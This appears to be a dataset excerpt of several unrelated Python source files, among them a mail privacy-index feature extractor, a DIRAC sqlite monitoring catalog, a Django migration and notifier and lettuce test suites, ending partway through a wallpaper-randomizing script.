code
stringlengths 1
199k
|
|---|
import mips.registers as mr

# Label and byte size of the memory area used when the register allocator
# must spill values it cannot keep in registers.
SPILL_MEM_LABEL = 'SPILL_MEMORY'
SPILL_MEM_SIZE = 64  # bytes

# Registers available for temporaries (MIPS $t registers).
TEMPORARY_REGISTER_SET = mr.T_REGISTERS
# Backward-compatible alias: the original, misspelled name is preserved so
# existing importers keep working.  New code should use the spelling above.
TEMPROARY_REGISTER_SET = TEMPORARY_REGISTER_SET

# NOTE(review): flag name suggests test-only code paths are toggled by this;
# confirm against the modules that read it.
NOT_TESTING_FUNCTIONS = False
|
"""Caliopen mail message privacy features extraction methods."""
from __future__ import absolute_import, print_function, unicode_literals
import logging
import pgpy
from caliopen_main.pi.parameters import PIParameter
from .helpers.spam import SpamScorer
from .helpers.ingress_path import get_ingress_features
from .helpers.importance_level import compute_importance
from .types import init_features
# Module-level logger for this feature-extraction module.
log = logging.getLogger(__name__)
# Privacy-index points granted per TLS/SSL version observed on the ingress
# connection (higher is better); keys match values parsed from the
# 'Received' headers by the ingress-path helpers.
TLS_VERSION_PI = {
'tlsv1/sslv3': 2,
'tls1': 7,
'tlsv1': 7,
'tls12': 10,
}
# Leading marker of an inline (non-MIME) PGP-encrypted message body.
PGP_MESSAGE_HEADER = '\n-----BEGIN PGP MESSAGE-----'
class InboundMailFeature(object):
    """Process a parsed mail message and extract available privacy features."""

    def __init__(self, message, config):
        """Get a ``MailMessage`` instance and extract privacy features.

        :param message: parsed inbound mail message
        :param config: configuration mapping (``.get()``-able)
        """
        self.message = message
        self.config = config
        self._features = init_features('message')

    def is_blacklist_mx(self, mx):
        """Return True if ``mx`` is in the configured blacklist."""
        blacklisted = self.config.get('blacklistes.mx')
        if not blacklisted:
            return False
        return mx in blacklisted

    def is_whitelist_mx(self, mx):
        """Return True if ``mx`` is in the configured whitelist."""
        whitelistes = self.config.get('whitelistes.mx')
        if not whitelistes:
            return False
        return mx in whitelistes

    @property
    def internal_domains(self):
        """Get internal hosts from configuration (empty list if unset)."""
        domains = self.config.get('internal_domains')
        return domains if domains else []

    def emitter_reputation(self, mx):
        """Return the emitter MX reputation label."""
        if self.is_blacklist_mx(mx):
            return 'blacklisted'
        if self.is_whitelist_mx(mx):
            return 'whitelisted'
        return 'unknown'

    def emitter_certificate(self):
        """Get the certificate from emitter.

        Not implemented yet; always returns None.
        """
        return None

    @property
    def mail_agent(self):
        """Get the mailer used for this message (lower-cased X-Mailer)."""
        # XXX normalize better and more ?
        return self.message.mail.get('X-Mailer', '').lower()

    @property
    def transport_signature(self):
        """Get the transport (DKIM) signature if any."""
        return self.message.mail.get('DKIM-Signature')

    @property
    def spam_informations(self):
        """Return a global spam_score and related features."""
        spam = SpamScorer(self.message.mail)
        return {'spam_score': spam.score,
                'spam_method': spam.method,
                'is_spam': spam.is_spam}

    @property
    def is_internal(self):
        """Return true if it's an internal message."""
        # Guard against a missing 'From' header: 'x in None' raises TypeError.
        from_ = self.message.mail.get('From') or ''
        for domain in self.internal_domains:
            if domain in from_:
                return True
        return False

    def get_signature_informations(self):
        """Get message signature features."""
        signed_parts = [x for x in self.message.attachments
                        if 'pgp-sign' in x.content_type]
        if not signed_parts:
            return {}
        sign = pgpy.PGPSignature()
        features = {'message_signed': True,
                    'message_signature_type': 'PGP'}
        try:
            sign.parse(signed_parts[0].data)
            features.update({'message_signer': sign.signer})
        except Exception as exc:
            log.error('Unable to parse pgp signature {}'.format(exc))
        return features

    def get_encryption_informations(self):
        """Get message encryption features."""
        is_encrypted = False
        if 'encrypted' in self.message.extra_parameters:
            is_encrypted = True
        # Maybe pgp/inline ?
        if not is_encrypted:
            try:
                body = self.message.body_plain.decode('utf-8')
                if body.startswith(PGP_MESSAGE_HEADER):
                    is_encrypted = True
            except UnicodeDecodeError:
                # log.warn is a deprecated alias of log.warning
                log.warning('Invalid body_plain encoding for message')
        return {'message_encrypted': is_encrypted,
                'message_encryption_method': 'pgp' if is_encrypted else ''}

    def _get_features(self):
        """Extract privacy features into a single flat dict."""
        features = self._features.copy()
        received = self.message.headers.get('Received', [])
        features.update(get_ingress_features(received, self.internal_domains))
        mx = features.get('ingress_server')
        reputation = None if not mx else self.emitter_reputation(mx)
        features['mail_emitter_mx_reputation'] = reputation
        features['mail_emitter_certificate'] = self.emitter_certificate()
        features['mail_agent'] = self.mail_agent
        features['is_internal'] = self.is_internal
        features.update(self.get_signature_informations())
        features.update(self.get_encryption_informations())
        features.update(self.spam_informations)
        if self.transport_signature:
            features.update({'transport_signed': True})
        return features

    def _compute_pi(self, participants, features):
        """Compute Privacy Indexes for a message."""
        log.info('PI features {}'.format(features))
        pi_cx = {}  # Contextual privacy index
        pi_co = {}  # Comportemental privacy index
        pi_t = {}   # Technical privacy index
        reput = features.get('mail_emitter_mx_reputation')
        if reput == 'whitelisted':
            pi_cx['reputation_whitelist'] = 20
        elif reput == 'unknown':
            pi_cx['reputation_unknow'] = 10
        known_contacts = []
        known_public_key = 0
        for part, contact in participants:
            if contact:
                known_contacts.append(contact)
                if contact.public_key:
                    known_public_key += 1
        if len(participants) == len(known_contacts):
            # If every participant is already a known contact, the contextual
            # index gains the lowest comportmental PI among those contacts.
            contact_pi_cos = [x.pi['comportment'] for x in known_contacts
                              if x.pi and 'comportment' in x.pi]
            if contact_pi_cos:
                pi_cx['known_contacts'] = min(contact_pi_cos)
            if known_public_key == len(known_contacts):
                pi_co['contact_pubkey'] = 20
        ext_hops = features.get('nb_external_hops', 0)
        if ext_hops <= 1:
            tls = features.get('ingress_socket_version')
            if tls:
                if tls not in TLS_VERSION_PI:
                    log.warning('Unknown TLS version {}'.format(tls))
                else:
                    # BUG FIX: pi_t is a dict, so the original
                    # 'pi_t += TLS_VERSION_PI[tls]' raised TypeError whenever
                    # a known TLS version was seen; store it as an entry so it
                    # is summed with the other technical-index contributions.
                    pi_t['ingress_socket_version'] = TLS_VERSION_PI[tls]
        if features.get('mail_emitter_certificate'):
            pi_t['emitter_certificate'] = 10
        if features.get('transport_signed'):
            pi_t['transport_signed'] = 10
        if features.get('message_encrypted'):
            pi_t['encrypted'] = 30
        log.info('PI compute t:{} cx:{} co:{}'.format(pi_t, pi_cx, pi_co))
        return PIParameter({'technic': sum(pi_t.values()),
                            'context': sum(pi_cx.values()),
                            'comportment': sum(pi_co.values()),
                            'version': 0})

    def process(self, user, message, participants):
        """
        Process the message for privacy features and PI compute.

        :param user: user the message belong to
        :ptype user: caliopen_main.user.core.User
        :param message: a message parameter that will be updated with PI
        :ptype message: NewMessage
        :param participants: an array of participant with related Contact
        :ptype participants: list(Participant, Contact)
        """
        features = self._get_features()
        message.pi = self._compute_pi(participants, features)
        il = compute_importance(user, message, features, participants)
        message.privacy_features = features
        message.importance_level = il
|
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Set ordering and plural display name on the ``profesor`` model."""

    dependencies = [
        ('posgradmin', '0039_auto_20191120_2249'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='profesor',
            options={
                'ordering': ['user__first_name', 'user__last_name'],
                'verbose_name_plural': 'Profesores',
            },
        ),
    ]
|
""" Interacts with sqlite3 db
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
import sqlite3
import os
import hashlib
import random
import time
import DIRAC
from DIRAC import gLogger, S_OK, S_ERROR
from DIRAC.FrameworkSystem.private.monitoring.Activity import Activity
from DIRAC.Core.Utilities import Time
class MonitoringCatalog(object):
    """
    This class is used to perform all kinds queries to the sqlite3 database.
    """

    def __init__(self, dataPath):
        """
        Initialize monitoring catalog.

        :param dataPath: directory that holds (or will hold) monitoring.db
        """
        self.dbConn = False
        self.dataPath = dataPath
        self.log = gLogger.getSubLogger("ActivityCatalog")
        self.createSchema()

    def __connect(self):
        """
        Connects to database (lazily, on first use).
        """
        if not self.dbConn:
            dbPath = "%s/monitoring.db" % self.dataPath
            self.dbConn = sqlite3.connect(dbPath, timeout=20, isolation_level=None)
            # These two settings dramatically increase the performance
            # at the cost of a small corruption risk in case of OS crash
            # It is acceptable though, given the nature of the data
            # details here https://www.sqlite.org/pragma.html
            c = self.dbConn.cursor()
            c.execute("PRAGMA synchronous = OFF")
            c.execute("PRAGMA journal_mode = TRUNCATE")

    def __dbExecute(self, query, values=False):
        """
        Executes a sql statement.

        :type query: string
        :param query: The query to be executed.
        :type values: bool
        :param values: To execute query with values or not.
        :return: the cursor.
        """
        cursor = self.dbConn.cursor()  # pylint: disable=no-member
        self.log.debug("Executing %s" % query)
        executed = False
        retry = 0
        # Retry a few times: sqlite can raise on concurrent access even with
        # the timeout set on the connection.
        while not executed and retry < 10:
            retry += 1
            try:
                if values:
                    cursor.execute(query, values)
                else:
                    cursor.execute(query)
                executed = True
            except Exception:
                self.log.exception("Exception executing statement", "query: %s, values: %s" % (query, values))
                # Random backoff to de-synchronize competing writers.
                time.sleep(random.random())
        if not executed:
            self.log.error("Could not execute query, big mess ahead", "query: %s, values: %s" % (query, values))
        return cursor

    def __createTables(self):
        """
        Creates tables if not already created.
        """
        self.log.info("Creating tables in db")
        filePath = "%s/monitoringSchema.sql" % os.path.dirname(__file__)
        try:
            # 'with' guarantees the schema file is closed even on error
            # (the original leaked the handle if read() raised).
            with open(filePath) as fd:
                buff = fd.read()
        except IOError:
            DIRAC.abort(1, "Can't read monitoring schema", filePath)
        # Execute the schema statement by statement (split on ';').
        while buff.find(";") > -1:
            limit = buff.find(";") + 1
            sqlQuery = buff[:limit].replace("\n", "")
            buff = buff[limit:]
            try:
                self.__dbExecute(sqlQuery)
            except Exception as e:
                DIRAC.abort(1, "Can't create tables", str(e))

    def createSchema(self):
        """
        Creates all the sql schema if it does not exist.
        """
        self.__connect()
        try:
            sqlQuery = "SELECT name FROM sqlite_master WHERE type='table';"
            c = self.__dbExecute(sqlQuery)
            tablesList = c.fetchall()
            if len(tablesList) < 2:
                self.__createTables()
        except Exception as e:
            self.log.fatal("Failed to startup db engine", str(e))
            return False
        return True

    def __delete(self, table, dataDict):
        """
        Executes an sql delete.

        :type table: string
        :param table: name of the table.
        :type dataDict: dictionary
        :param dataDict: the data dictionary; list values become OR groups.
        """
        query = "DELETE FROM %s" % table
        valuesList = []
        keysList = []
        for key in dataDict:
            if isinstance(dataDict[key], list):
                orList = []
                for keyValue in dataDict[key]:
                    valuesList.append(keyValue)
                    orList.append("%s = ?" % key)
                keysList.append("( %s )" % " OR ".join(orList))
            else:
                valuesList.append(dataDict[key])
                keysList.append("%s = ?" % key)
        if keysList:
            query += " WHERE %s" % (" AND ".join(keysList))
        self.__dbExecute("%s;" % query, values=valuesList)

    def __select(self, fields, table, dataDict, extraCond="", queryEnd=""):
        """
        Executes a sql select.

        :type fields: string or list
        :param fields: The fields required, as a string or list of strings.
        :type table: string
        :param table: name of the table.
        :type dataDict: dictionary
        :param dataDict: the data dictionary; list values become OR groups.
        :param extraCond: extra condition ANDed to the WHERE clause.
        :param queryEnd: trailing SQL (ORDER BY / LIMIT ...).
        :return: a list of rows.
        """
        valuesList = []
        keysList = []
        for key in dataDict:
            if isinstance(dataDict[key], list):
                orList = []
                for keyValue in dataDict[key]:
                    valuesList.append(keyValue)
                    orList.append("%s = ?" % key)
                keysList.append("( %s )" % " OR ".join(orList))
            else:
                valuesList.append(dataDict[key])
                keysList.append("%s = ?" % key)
        if isinstance(fields, six.string_types):
            fields = [fields]
        if len(keysList) > 0:
            whereCond = "WHERE %s" % (" AND ".join(keysList))
        else:
            whereCond = ""
        if extraCond:
            if whereCond:
                whereCond += " AND %s" % extraCond
            else:
                whereCond = "WHERE %s" % extraCond
        query = "SELECT %s FROM %s %s %s;" % (",".join(fields), table, whereCond, queryEnd)
        c = self.__dbExecute(query, values=valuesList)
        return c.fetchall()

    def __insert(self, table, specialDict, dataDict):
        """
        Executes an sql insert.

        :type table: string
        :param table: name of the table.
        :type specialDict: dictionary
        :param specialDict: columns whose values are raw SQL (e.g. NULL).
        :type dataDict: dictionary
        :param dataDict: columns bound through placeholders.
        :return: the number of rows inserted.
        """
        valuesList = []
        valuePoitersList = []
        namesList = []
        for key in specialDict:
            namesList.append(key)
            valuePoitersList.append(specialDict[key])
        for key in dataDict:
            namesList.append(key)
            valuePoitersList.append("?")
            valuesList.append(dataDict[key])
        query = "INSERT INTO %s (%s) VALUES (%s);" % (table, ", ".join(namesList), ",".join(valuePoitersList))
        c = self.__dbExecute(query, values=valuesList)
        return c.rowcount

    def __update(self, newValues, table, dataDict, extraCond=""):
        """
        Executes a sql update.

        :type newValues: dictionary
        :param newValues: a dictionary with new values.
        :type table: string
        :param table: name of the table.
        :type dataDict: dictionary
        :param dataDict: the data dictionary; list values become OR groups.
        :param extraCond: extra condition ANDed to the WHERE clause.
        :return: the number of rows updated.
        """
        valuesList = []
        keysList = []
        updateFields = []
        for key in newValues:
            updateFields.append("%s = ?" % key)
            valuesList.append(newValues[key])
        for key in dataDict:
            if isinstance(dataDict[key], list):
                orList = []
                for keyValue in dataDict[key]:
                    valuesList.append(keyValue)
                    orList.append("%s = ?" % key)
                keysList.append("( %s )" % " OR ".join(orList))
            else:
                valuesList.append(dataDict[key])
                keysList.append("%s = ?" % key)
        if len(keysList) > 0:
            whereCond = "WHERE %s" % (" AND ".join(keysList))
        else:
            whereCond = ""
        if extraCond:
            if whereCond:
                whereCond += " AND %s" % extraCond
            else:
                whereCond = "WHERE %s" % extraCond
        query = "UPDATE %s SET %s %s;" % (table, ",".join(updateFields), whereCond)
        c = self.__dbExecute(query, values=valuesList)
        return c.rowcount

    def registerSource(self, sourceDict):
        """
        Registers an activity source.

        :type sourceDict: dictionary
        :param sourceDict: the source dictionary.
        :return: the source id (int), or -1 if the insert failed.
        """
        retList = self.__select("id", "sources", sourceDict)
        if len(retList) > 0:
            return retList[0][0]
        else:
            self.log.info("Registering source", str(sourceDict))
            if self.__insert("sources", {"id": "NULL"}, sourceDict) == 0:
                return -1
            return self.__select("id", "sources", sourceDict)[0][0]

    def registerActivity(self, sourceId, acName, acDict):
        """
        Register an activity.

        :type sourceId: string
        :param sourceId: The source id.
        :type acName: string
        :param acName: name of the activity.
        :type acDict: dictionary
        :param acDict: The activity dictionary containing information about 'category', 'description', 'bucketLength',
            'type', 'unit'.
        :return: the rrd filename, or -1 if the insert failed.
        """
        m = hashlib.md5()
        acDict["name"] = acName
        acDict["sourceId"] = sourceId
        # The rrd filename is derived from a hash of the full activity spec.
        m.update(str(acDict).encode())
        retList = self.__select("filename", "activities", acDict)
        if len(retList) > 0:
            return retList[0][0]
        else:
            acDict["lastUpdate"] = int(Time.toEpoch() - 86000)
            filePath = m.hexdigest()
            # Shard rrd files into two-character prefix directories.
            filePath = "%s/%s.rrd" % (filePath[:2], filePath)
            self.log.info("Registering activity", str(acDict))
            # This is basically called by the ServiceInterface inside registerActivities method and then all the activity
            # information is stored in the sqlite3 db using the __insert method.
            if (
                self.__insert(
                    "activities",
                    {
                        "id": "NULL",
                        "filename": "'%s'" % filePath,
                    },
                    acDict,
                )
                == 0
            ):
                return -1
            return self.__select("filename", "activities", acDict)[0][0]

    def getFilename(self, sourceId, acName):
        """
        Gets rrd filename for an activity.

        :type sourceId: string
        :param sourceId: The source id.
        :type acName: string
        :param acName: name of the activity.
        :return: The filename in a string (empty if not found).
        """
        queryDict = {"sourceId": sourceId, "name": acName}
        retList = self.__select("filename", "activities", queryDict)
        if len(retList) == 0:
            return ""
        else:
            return retList[0][0]

    def findActivity(self, sourceId, acName):
        """
        Finds activity.

        :type sourceId: string
        :param sourceId: The source id.
        :type acName: string
        :param acName: name of the activity.
        :return: A list containing all the activity information, or False.
        """
        queryDict = {"sourceId": sourceId, "name": acName}
        retList = self.__select(
            "id, name, category, unit, type, description, filename, bucketLength, lastUpdate", "activities", queryDict
        )
        if len(retList) == 0:
            return False
        else:
            return retList[0]

    def activitiesQuery(self, selDict, sortList, start, limit):
        """
        Gets all the sources and activities details in a joined format.

        :type selDict: dictionary
        :param selDict: The fields inside the select query.
        :type sortList: list
        :param sortList: A list in sorted order of the data.
        :type start: int
        :param start: The point or tuple from where to start.
        :type limit: int
        :param limit: The number of tuples to select from the starting point.
        :return: S_OK with a tuple of the result list and fields list.
        """
        fields = [
            "sources.id",
            "sources.site",
            "sources.componentType",
            "sources.componentLocation",
            "sources.componentName",
            "activities.id",
            "activities.name",
            "activities.category",
            "activities.unit",
            "activities.type",
            "activities.description",
            "activities.bucketLength",
            "activities.filename",
            "activities.lastUpdate",
        ]
        extraSQL = ""
        if sortList:
            # Validate sort fields against the whitelist above: they are
            # interpolated into SQL and must not be attacker-controlled.
            for sorting in sortList:
                if sorting[0] not in fields:
                    return S_ERROR("Sorting field %s is invalid" % sorting[0])
            extraSQL = "ORDER BY %s" % ",".join(["%s %s" % sorting for sorting in sortList])
        if limit:
            if start:
                extraSQL += " LIMIT %s OFFSET %s" % (limit, start)
            else:
                extraSQL += " LIMIT %s" % limit
        # This method basically takes in some condition and then based on those performs SQL Join on the
        # sources and activities table of the sqlite3 db and returns the corresponding result.
        retList = self.__select(
            ", ".join(fields), "sources, activities", selDict, "sources.id = activities.sourceId", extraSQL
        )
        return S_OK((retList, fields))

    def setLastUpdate(self, sourceId, acName, lastUpdateTime):
        """
        Updates the lastUpdate timestamp for a particular activity using the source id.

        :type sourceId: string
        :param sourceId: The source id.
        :type acName: string
        :param acName: name of the activity.
        :type lastUpdateTime: string
        :param lastUpdateTime: The last update time in the proper format.
        :return: the number of rows updated.
        """
        queryDict = {"sourceId": sourceId, "name": acName}
        return self.__update({"lastUpdate": lastUpdateTime}, "activities", queryDict)

    def getLastUpdate(self, sourceId, acName):
        """
        Gets the lastUpdate timestamp for a particular activity using the source id.

        :type sourceId: string
        :param sourceId: The source id.
        :type acName: string
        :param acName: name of the activity.
        :return: row with the last update time, or False if not found.
        """
        queryDict = {"sourceId": sourceId, "name": acName}
        # BUG FIX: this used self.__update, which returns a row count (int),
        # so len(retList) raised TypeError and the timestamp was never read.
        retList = self.__select("lastUpdate", "activities", queryDict)
        if len(retList) == 0:
            return False
        else:
            return retList[0]

    def queryField(self, field, definedFields):
        """
        Query the values of a field given a set of defined ones.

        :type field: string
        :param field: The field required in a string.
        :type definedFields: dictionary
        :param definedFields: A set of defined fields.
        :return: A list of values.
        """
        retList = self.__select(field, "sources, activities", definedFields, "sources.id = activities.sourceId")
        return retList

    def getMatchingActivities(self, condDict):
        """
        Gets all activities matching the defined conditions.

        :type condDict: dictionary.
        :param condDict: A dictionary containing the conditions.
        :return: a list of matching activities.
        """
        retList = self.queryField(Activity.dbFields, condDict)
        acList = []
        for acData in retList:
            acList.append(Activity(acData))
        return acList

    def registerView(self, viewName, viewData, varFields):
        """
        Registers a new view.

        :type viewName: string
        :param viewName: Name of the view.
        :type viewData: dictionary
        :param viewData: A dictionary containing the view description.
        :type varFields: list
        :param varFields: A list of variable fields.
        :return: S_OK / S_ERROR with the corresponding error message.
        """
        retList = self.__select("id", "views", {"name": viewName})
        if len(retList) > 0:
            return S_ERROR("Name for view name already exists")
        retList = self.__select("name", "views", {"definition": viewData})
        if len(retList) > 0:
            return S_ERROR("View specification already defined with name '%s'" % retList[0][0])
        self.__insert(
            "views", {"id": "NULL"}, {"name": viewName, "definition": viewData, "variableFields": ", ".join(varFields)}
        )
        return S_OK()

    def getViews(self, onlyStatic):
        """
        Gets views.

        :type onlyStatic: bool
        :param onlyStatic: Whether the views required are static or not.
        :return: A list of values.
        """
        queryCond = {}
        if onlyStatic:
            queryCond["variableFields"] = ""
        return self.__select("id, name, variableFields", "views", queryCond)

    def getViewById(self, viewId):
        """
        Gets a view for a given id.

        :type viewId: string or int
        :param viewId: The view id; a string is looked up by name.
        :return: A list of values.
        """
        if isinstance(viewId, six.string_types):
            return self.__select("definition, variableFields", "views", {"name": viewId})
        else:
            return self.__select("definition, variableFields", "views", {"id": viewId})

    def deleteView(self, viewId):
        """
        Deletes a view for a given id.

        :type viewId: string
        :param viewId: The view id.
        """
        self.__delete("views", {"id": viewId})

    def getSources(self, dbCond, fields=None):
        """
        Gets souces for a given db condition.

        :type dbCond: dictionary
        :param dbCond: The required database conditions.
        :type fields: list
        :param fields: A list of required fields (default set used if empty).
        :return: The list of results after the query is performed.
        """
        # BUG FIX: 'fields=[]' was a mutable default argument; None avoids
        # sharing the list across calls while keeping the same behavior.
        if not fields:
            fields = "id, site, componentType, componentLocation, componentName"
        else:
            fields = ", ".join(fields)
        return self.__select(fields, "sources", dbCond)

    def getActivities(self, dbCond):
        """
        Gets activities given a db condition.

        :type dbCond: dictionary
        :param dbCond: The required database conditions.
        :return: a list of activities.
        """
        return self.__select("id, name, category, unit, type, description, bucketLength", "activities", dbCond)

    def deleteActivity(self, sourceId, activityId):
        """
        Deletes an activity.

        :type sourceId: string
        :param sourceId: The source id.
        :type activityId: string
        :param activityId: The activity id.
        :return: S_OK with rrd filename / S_ERROR with a message.
        """
        acCond = {"sourceId": sourceId, "id": activityId}
        acList = self.__select("filename", "activities", acCond)
        if len(acList) == 0:
            return S_ERROR("Activity does not exist")
        rrdFile = acList[0][0]
        self.__delete("activities", acCond)
        acList = self.__select("id", "activities", {"sourceId": sourceId})
        # Drop the source row once its last activity is gone.
        if len(acList) == 0:
            self.__delete("sources", {"id": sourceId})
        return S_OK(rrdFile)
|
import os
import subprocess
from os.path import dirname, abspath, join, curdir
from nose.tools import assert_equals, with_setup
from tests.asserts import prepare_stdout
def test_imports_terrain_under_path_that_is_run():
    """Running inside a feature dir must make its terrain.py importable."""
    old_path = abspath(curdir)
    os.chdir(join(abspath(dirname(__file__)), 'simple_features', '1st_feature_dir'))
    try:
        # BUG FIX: the embedded command used a Python 2 'print' statement,
        # which is a SyntaxError on Python 3 (and this module already relies
        # on the Python-3-only subprocess.getstatusoutput).
        status, output = subprocess.getstatusoutput(
            'python -c "from lettuce import world;'
            'assert hasattr(world, \'works_fine\'); print(\'it passed!\')"')
        assert_equals(status, 0)
        assert_equals(output, "it passed!")
    finally:
        # Restore the working directory even when the assertions fail, so
        # later tests are not run from the wrong directory.
        os.chdir(old_path)
@with_setup(prepare_stdout)
def test_after_each_all_is_executed_before_each_all():
    "terrain.before.each_all and terrain.after.each_all decorators"
    from lettuce import Runner
    from lettuce import step
    from lettuce.terrain import after, before, world

    # Collect a trace of hook/step execution order.
    world.all_steps = []

    @before.all
    def record_before():
        world.all_steps.append('before')

    @step('append 1 in world all steps')
    def record_step_one(step):
        world.all_steps.append("1")

    @step('append 2 more')
    def record_step_two(step):
        world.all_steps.append("2")

    @step('append 3 in world all steps')
    def record_step_three(step):
        world.all_steps.append("3")

    @after.all
    def record_after(total):
        world.all_steps.append('after')

    feature_dir = join(abspath(dirname(__file__)), 'simple_features', '2nd_feature_dir')
    Runner(feature_dir).run()

    # before.all runs first, then the three steps in order, then after.all.
    assert_equals(world.all_steps, ['before', '1', '2', '3', 'after'])
|
"""
Test notifiers
"""
import unittest
from sickchill.oldbeard import db
from sickchill.oldbeard.notifiers.emailnotify import Notifier as EmailNotifier
from sickchill.oldbeard.notifiers.prowl import Notifier as ProwlNotifier
from sickchill.tv import TVEpisode, TVShow
from sickchill.views.home import Home
from tests import test_lib as test
class NotifierTests(test.SickChillTestDBCase):
    """
    Test notifiers
    """

    @staticmethod
    def _create_shows(first_indexer_id, count, episodes_per_show):
        """Create, save and return ``count`` shows with episodes.

        Extracted helper: setUpClass previously duplicated this loop verbatim
        for the legacy and the new-style shows.
        """
        shows = []
        for show_counter in range(first_indexer_id, first_indexer_id + count):
            show = TVShow(1, show_counter)
            show.name = "Show " + str(show_counter)
            show.episodes = []
            for episode_counter in range(0, episodes_per_show):
                episode = TVEpisode(show, test.SEASON, episode_counter)
                episode.name = "Episode " + str(episode_counter + 1)
                episode.quality = "SDTV"
                show.episodes.append(episode)
            show.saveToDB()
            shows.append(show)
        return shows

    @classmethod
    def setUpClass(cls):
        """Create the legacy and new-style shows used by all tests."""
        num_legacy_shows = 3
        num_shows = 3
        num_episodes_per_show = 5
        cls.mydb = db.DBConnection()
        # Per-show-notifications were originally added for email notifications only. To add
        # this feature to other notifiers, it was necessary to alter the way text is stored in
        # one of the DB columns. Therefore, to test properly, we must create some shows that
        # store emails in the old method (legacy method) and then other shows that will use
        # the new method.
        cls.legacy_shows = cls._create_shows(100, num_legacy_shows, num_episodes_per_show)
        cls.shows = cls._create_shows(200, num_shows, num_episodes_per_show)

    def setUp(self):
        """
        Set up tests
        """
        self._debug_spew("\n\r")

    @unittest.skip('Not yet implemented')
    def test_boxcar(self):
        """
        Test boxcar notifications
        """
        pass

    @unittest.skip('Cannot call directly without a request')
    def test_email(self):
        """
        Test email notifications
        """
        email_notifier = EmailNotifier()
        # Per-show-email notifications were added early on and utilized a different format than the other notifiers.
        # Therefore, to test properly (and ensure backwards compatibility), this routine will test shows that use
        # both the old and the new storage methodology
        legacy_test_emails = "email-1@address.com,email2@address.org,email_3@address.tv"
        test_emails = "email-4@address.com,email5@address.org,email_6@address.tv"
        for show in self.legacy_shows:
            showid = self._get_showid_by_showname(show.show_name)
            self.mydb.action("UPDATE tv_shows SET notify_list = ? WHERE show_id = ?", [legacy_test_emails, showid])
        for show in self.shows:
            showid = self._get_showid_by_showname(show.show_name)
            Home.saveShowNotifyList(show=showid, emails=test_emails)
        # Now, iterate through all shows using the email list generation routines that are used in the notifier proper
        shows = self.legacy_shows + self.shows
        for show in shows:
            for episode in show.episodes:
                ep_name = episode._format_pattern('%SN - %Sx%0E - %EN - ') + episode.quality
                show_name = email_notifier._parseEp(ep_name)
                recipients = email_notifier._generate_recipients(show_name)
                self._debug_spew("- Email Notifications for " + show.name + " (episode: " + episode.name + ") will be sent to:")
                for email in recipients:
                    self._debug_spew("-- " + email.strip())
                self._debug_spew("\n\r")
        return True

    @unittest.skip('Not yet implemented')
    def test_emby(self):
        """
        Test emby notifications
        """
        pass

    @unittest.skip('Not yet implemented')
    def test_freemobile(self):
        """
        Test freemobile notifications
        """
        pass

    @unittest.skip('Not yet implemented')
    def test_growl(self):
        """
        Test growl notifications
        """
        pass

    @unittest.skip('Not yet implemented')
    def test_kodi(self):
        """
        Test kodi notifications
        """
        pass

    @unittest.skip('Not yet implemented')
    def test_libnotify(self):
        """
        Test libnotify notifications
        """
        pass

    @unittest.skip('Not yet implemented')
    def test_nma(self):
        """
        Test nma notifications
        """
        pass

    @unittest.skip('Not yet implemented')
    def test_nmj(self):
        """
        Test nmj notifications
        """
        pass

    @unittest.skip('Not yet implemented')
    def test_nmjv2(self):
        """
        Test nmjv2 notifications
        """
        pass

    @unittest.skip('Not yet implemented')
    def test_plex(self):
        """
        Test plex notifications
        """
        pass

    @unittest.skip('Cannot call directly without a request')
    def test_prowl(self):
        """
        Test prowl notifications
        """
        prowl_notifier = ProwlNotifier()
        # Prowl per-show-notifications only utilize the new methodology for storage; therefore, the list of legacy_shows
        # will not be altered (to preserve backwards compatibility testing)
        test_prowl_apis = "11111111111111111111,22222222222222222222"
        for show in self.shows:
            showid = self._get_showid_by_showname(show.show_name)
            Home.saveShowNotifyList(show=showid, prowlAPIs=test_prowl_apis)
        # Now, iterate through all shows using the Prowl API generation routines that are used in the notifier proper
        for show in self.shows:
            for episode in show.episodes:
                ep_name = episode._format_pattern('%SN - %Sx%0E - %EN - ') + episode.quality
                show_name = prowl_notifier._parse_episode(ep_name)
                recipients = prowl_notifier._generate_recipients(show_name)
                self._debug_spew("- Prowl Notifications for " + show.name + " (episode: " + episode.name + ") will be sent to:")
                for api in recipients:
                    self._debug_spew("-- " + api.strip())
                self._debug_spew("\n\r")
        return True

    @unittest.skip('Not yet implemented')
    def test_pushalot(self):
        """
        Test pushalot notifications
        """
        pass

    @unittest.skip('Not yet implemented')
    def test_pushbullet(self):
        """
        Test pushbullet notifications
        """
        pass

    @unittest.skip('Not yet implemented')
    def test_pushover(self):
        """
        Test pushover notifications
        """
        pass

    @unittest.skip('Not yet implemented')
    def test_pytivo(self):
        """
        Test pytivo notifications
        """
        pass

    @unittest.skip('Not yet implemented')
    def test_synoindex(self):
        """
        Test synoindex notifications
        """
        pass

    @unittest.skip('Not yet implemented')
    def test_synologynotifier(self):
        """
        Test synologynotifier notifications
        """
        pass

    @unittest.skip('Not yet implemented')
    def test_trakt(self):
        """
        Test trakt notifications
        """
        pass

    @unittest.skip('Not yet implemented')
    def test_tweet(self):
        """
        Test tweet notifications
        """
        pass

    @unittest.skip('Not yet implemented')
    def test_twilio(self):
        """
        Test twilio notifications
        """
        pass

    @staticmethod
    def _debug_spew(text):
        """
        Spew text notifications

        :param text: to spew
        :return:
        """
        # Only prints when the module is executed directly, not under a runner.
        if __name__ == '__main__' and text is not None:
            print(text)

    def _get_showid_by_showname(self, showname):
        """
        Get show ID by show name

        :param showname:
        :return: the show_id, or -1 when not found / ambiguous
        """
        if showname is not None:
            rows = self.mydb.select("SELECT show_id FROM tv_shows WHERE show_name = ?", [showname])
            if len(rows) == 1:
                return rows[0]['show_id']
        return -1
if __name__ == '__main__':
    # Banner, then run the notifier suite with verbose output.
    banner = (
        "==================",
        "STARTING - NOTIFIER TESTS",
        "==================",
        "######################################################################",
    )
    for banner_line in banner:
        print(banner_line)
    SUITE = unittest.TestLoader().loadTestsFromTestCase(NotifierTests)
    unittest.TextTestRunner(verbosity=2).run(SUITE)
|
import os
import random

picturespath = '/storage/pictures'

# Pick the next wallpaper only among files that are NOT the current
# 'random*' wallpaper.  BUG FIX: the original could pick the 'random*' file
# itself, rename it in the loop below, and then crash on the final
# os.rename because the picked path no longer existed.
candidates = [name for name in os.listdir(picturespath)
              if not name.startswith('random')]
rfilename = random.choice(candidates)
rextension = os.path.splitext(rfilename)[1]

for filename in os.listdir(picturespath):
    if filename.startswith('random'):
